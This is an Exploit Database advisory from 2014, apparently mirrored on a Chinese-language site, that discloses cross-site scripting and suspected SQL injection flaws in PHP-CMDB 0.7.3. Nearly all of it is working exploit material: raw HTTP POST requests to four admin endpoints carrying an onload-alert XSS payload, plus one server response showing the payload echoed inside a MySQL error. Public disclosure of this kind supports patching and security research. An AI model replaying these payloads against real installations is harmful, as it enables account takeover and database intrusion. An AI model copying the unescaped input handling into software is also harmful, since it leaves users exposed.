PHP-CMDB 0.7.3 – Multiple Vulnerabilities

• Exploit Database
• 11 阅读

• 作者： HauntIT
  日期： 2014-02-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/31970/

• # ==============================================================
  # Title ...| Multiple vulnerabilities in PHP-CMDB
  # Version .| php-cmdb_0.7.3
  # Date ....| 27.02.2014
  # Found ...| HauntIT Blog
  # Home ....| 
  # ==============================================================
  
  [+] From admin logged-in
   
  
  # ==============================================================
  # 1. XSS in SQL error
  
  ---<request>---
  POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/index.php HTTP/1.1
  Host: 10.149.14.62
  (...)
  Content-Length: 57
  
  s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_form=1
  ---<request>---
  
  
  ---<response>---
  <td colspan='2' class='c_attr r_attr'>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><body/onload=alert(9999)>%' AND ci_cit_id=cit_id ORDER BY ci_title, cit_title' at line 1</td>
  </tr>
  ---<response>---
  
  Same parameter seems to be vulnerable to SQL Injection attack.
  ("The used SELECT statements have a different number of columns")
  
  # ==============================================================
  # 2. XSS
  
  ---<request>---
  POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/ci_create.php HTTP/1.1
  Host: 10.149.14.62
  (...)
  Content-Length: 93
  
  ci_id=0&ci_clone_id=0&ci_icon='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&ci_form=1&ci_cit_id=0
  ---<request>---
  
  
  
  # ==============================================================
  # 3. XSS /SQLi 
  
  ---<request>---
  POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/search_advanced.php HTTP/1.1
  Host: 10.149.14.62
  (...)
  Content-Length: 100
  
  s_form=2&s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_cit_id=0&s_cat_id=0&s_compare_operator=0
  ---<request>---
  
  
  # ==============================================================
  # 4. XSS / SQLi
  
  ---<request>---
  POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/u_create_run.php HTTP/1.1
  Host: 10.149.14.62
  (...)
  Content-Length: 153
  
  u_id=0&u_form=1&u_login='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&u_active=1&u_last_name=tester&u_first_name=tester&u_role_id=1&u_email=&u_auth_backend=0
  ---<request>---
  
  
  
  # ==============================================================
  # More @ http://HauntIT.blogspot.com
  # Thanks! ;)
  # o/